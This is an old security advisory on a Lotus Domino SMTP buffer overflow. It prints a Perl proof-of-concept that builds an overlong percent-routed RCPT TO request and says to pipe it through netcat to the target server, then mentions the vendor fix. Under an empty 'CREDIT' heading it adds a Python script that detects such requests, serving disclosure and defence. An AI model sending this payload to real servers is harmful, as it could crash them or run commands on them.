Reported January 23, 2001, by S.A.F.E.R.
Lotus Domino SMTP Server contains a policy feature that you can use to prevent email relaying. However, a malicious attacker can use a vulnerability in this policy feature to overflow the buffer and possibly launch arbitrary commands.

DEMONSTRATION

S.A.F.E.R. supplied the following proof-of-concept code:

-- cut --
#!/usr/bin/perl
$req="a" . "%A"x200 . "A"x600 . "%allowed.domain.com\@allowed.domain.com";
print "ehlo foo\nmail from: blah\@example.com\nrcpt to:$req\ndata\nfoo\n.\nquit\n";
-- cut --

Simply replace “allowed.domain.com” with the domain name running Lotus Notes SMTP Server, and pipe the output through netcat.

VENDOR RESPONSE

Lotus was informed of this vulnerability on November 2, 2000, and has fixed this issue in release 5.06.

CREDIT
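For servers that cannot be upgraded to the fixed release immediately, an SMTP proxy or log review can flag recipients shaped like the request in the demonstration above. The following is an added example, not part of the S.A.F.E.R. advisory or any Lotus code; the function names, thresholds and sample transcript are assumptions made for illustration.

```python
import re

# Thresholds are assumptions for this example, not values from the advisory.
# RFC 5321 section 4.5.3.1 limits a path to 256 octets and a local-part to 64.
MAX_PATH = 256
MAX_LOCAL = 64
MAX_PERCENT_HOPS = 1  # more than one '%' relay hop is rare in legitimate mail

RCPT_RE = re.compile(r"^\s*RCPT\s+TO:\s*(\S*)", re.IGNORECASE)


def check_rcpt(line):
    """Return reasons a RCPT TO line looks like the overlong relay request."""
    m = RCPT_RE.match(line)
    if not m:
        return []  # not a RCPT TO command
    path = m.group(1).strip("<>")
    local = path.rsplit("@", 1)[0]  # everything before the final '@'
    reasons = []
    if len(path) > MAX_PATH:
        reasons.append("path-too-long")
    if len(local) > MAX_LOCAL:
        reasons.append("local-part-too-long")
    if path.count("%") > MAX_PERCENT_HOPS:
        reasons.append("excess-percent-routing")
    return reasons


def scan_session(lines):
    """Return (line_number, reasons) for each suspicious RCPT TO in a transcript."""
    return [(n, r) for n, line in enumerate(lines, 1) if (r := check_rcpt(line))]


# Constructed transcript: line 3 is an ordinary recipient with one '%' hop,
# line 4 has the shape of the advisory's request (long '%'-laden local part).
SAMPLE = [
    "EHLO foo",
    "MAIL FROM:<blah@example.com>",
    "RCPT TO:<user%inside.example.com@example.com>",
    "RCPT TO:a" + "%A" * 200 + "A" * 600 + "%example.com@example.com",
    "DATA",
]

if __name__ == "__main__":
    for lineno, reasons in scan_session(SAMPLE):
        print(f"line {lineno}: {', '.join(reasons)}")
```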